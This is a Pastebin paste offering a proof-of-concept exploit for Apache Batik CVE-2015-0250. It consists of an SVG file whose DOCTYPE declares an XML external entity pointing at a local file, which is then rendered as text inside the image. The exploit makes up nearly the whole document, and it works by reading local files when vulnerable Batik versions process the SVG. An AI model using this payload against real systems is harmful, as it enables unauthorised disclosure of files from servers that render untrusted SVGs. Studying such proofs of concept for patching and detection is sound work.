An efficient PoC for Batik CVE-2015-0250

a guest Mar 21st, 2015 889 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!DOCTYPE svg [
  2.         <!ENTITY xxe SYSTEM "file:///tmp/pattern_create.txt">
  3. ]>
  4. <svg width="1366px" height="768px" viewBox="0 0 1366 768" version="1.2" xmlns="" style="fill:black">
  5.       <rect x="0" y="0" width="1366" height="768" style="fill:white"/>
  6.       <flowRoot font-size="25">
  7.          <flowRegion>
  8.            <rect x="20" y="20" width="1326" height="728" style="fill:black;opacity:0.1"/>
  9.          </flowRegion>
  10.          <flowDiv>
  11.             <flowPara>&xxe;</flowPara>
  12.          </flowDiv>
  13.       </flowRoot>
  14. </svg>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand